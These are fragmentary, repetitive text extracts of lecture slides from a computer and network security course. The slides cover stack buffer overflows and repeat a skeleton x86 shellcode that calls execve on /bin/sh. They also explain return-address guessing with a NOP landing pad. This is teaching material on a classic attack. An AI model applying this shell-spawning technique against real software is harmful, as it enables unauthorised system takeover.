jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
Obstacle #2: Guessing the Return Address
code
ret’ret’ret’ret’ret’ret’
Running Evil Code…
64
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
Obstacle #2: Guessing the Return AddressSolution: Add a NOP landing pad to increase the chance that your guess is right.
code
ret’ret’ret’ret’ret’ret’
nopnopnop
Running Evil Code…
65
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
Obstacle #2: Guessing the Return AddressSolution: Add a NOP landing pad to increase the chance that your guess is right.
code
ret’ret’ret’ret’ret’ret’
nopnopnop
Running Evil Code…
66
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
Obstacle #2: Guessing the Return AddressSolution: Add a NOP landing pad to increase the chance that your guess is right.
code
ret’ret’ret’ret’ret’ret’
nopnopnop
Running Evil Code…
67
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
Obstacle #2: Guessing the Return AddressSolution: Add a NOP landing pad to increase the chance that your guess is right.
code
ret’ret’ret’ret’ret’ret’
nopnopnop